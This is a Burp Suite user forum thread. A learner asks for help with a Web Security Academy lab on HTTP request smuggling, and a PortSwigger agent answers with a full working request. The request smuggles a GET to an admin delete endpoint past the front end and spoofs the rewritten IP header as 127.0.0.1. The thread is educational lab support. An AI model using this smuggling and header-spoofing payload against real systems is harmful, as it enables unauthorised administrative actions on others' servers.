Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

LAB: Exploiting HTTP request smuggling to reveal front-end request rewriting

Adam | Last updated: Nov 27, 2021 04:51AM UTC

Hello, I have followed everything exactly as written in the tutorial and in the video. At the end of the video Michael Sommer says "the lab is solved", but it isn't and has to keep trying and trying for two minutes and finally gets it to change to SOLVED. I'm exactly at that point. Yes, in REPEATER "Update Content-Length" is unchecked. I do have "HTTP Request Smuggler" installed. In solution #5 I couldn't see the admin panel so I went onto #6. I get to #6 in Solution: and it acknowledges the 127.0.0.1 with the "Admin interface only available if logged in as an administrator, or if requested from 127.0.0.1"...I change the 127.0.0.1 address to the one i was able to get in #3 but still unable to Solve the Lab. I had seen Michael Sommer have the same problem and solve in two minutes, but as I had followed every keystroke and after 6 hours I still can't solve it. What could I possibly be doing wrong??? Any help would be greatly appreciated, thank you.

Adam | Last updated: Nov 27, 2021 03:07PM UTC

I do have 2 spaces after x=1

Ben, PortSwigger Agent | Last updated: Nov 29, 2021 09:56AM UTC

Hi Adam, Just to confirm, it sounds like you are changing the address from 127.0.0.1 to the IP returned as a result of the request sent in step 3, is that correct? You do not need to change the IP address, you just need to add the header that is returned from the request in step 3 and give it the value 127.0.0.1 i.e. in the lab attempt I have just carried out, the header returned was X-ayZFvQ-Ip, so the final request I sent was: POST / HTTP/1.1 Host: ac201fbc1fd627ddc0effe2300f200de.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 166 Transfer-Encoding: chunked 0 GET /admin/delete?username=carlos HTTP/1.1 X-ayZFvQ-Ip: 127.0.0.1 Content-Type: application/x-www-form-urlencoded Content-Length: 10 Connection: close x=1

Adam | Last updated: Nov 29, 2021 08:07PM UTC

After I read your response and looked over everything in detail, I smacked my head in response in realizing I had missed the header response. I popped the header response in and solved the lab in about 20 seconds. After working on this lab for so long and realizing my unbelievable faux pas, I definitely have a strong understanding of the topic. Thank you for all your help. Sincerely, Adam...

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.